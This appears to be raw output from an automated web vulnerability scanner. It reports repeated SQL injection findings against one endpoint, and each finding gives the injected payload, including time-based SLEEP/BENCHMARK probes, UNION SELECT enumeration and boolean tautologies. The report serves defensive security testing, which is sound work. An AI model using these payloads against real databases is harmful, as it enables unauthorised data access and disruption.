href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1618\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1619\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*!10000%201/0%20*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1620\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1621\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1622\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND ('pKlZ'='\npKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1623\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '&&SLEEP(5)&&'1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1624\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND ('pKlZ'='\npKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1625\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1626Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1627\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1628\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1629\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1630\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1631\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 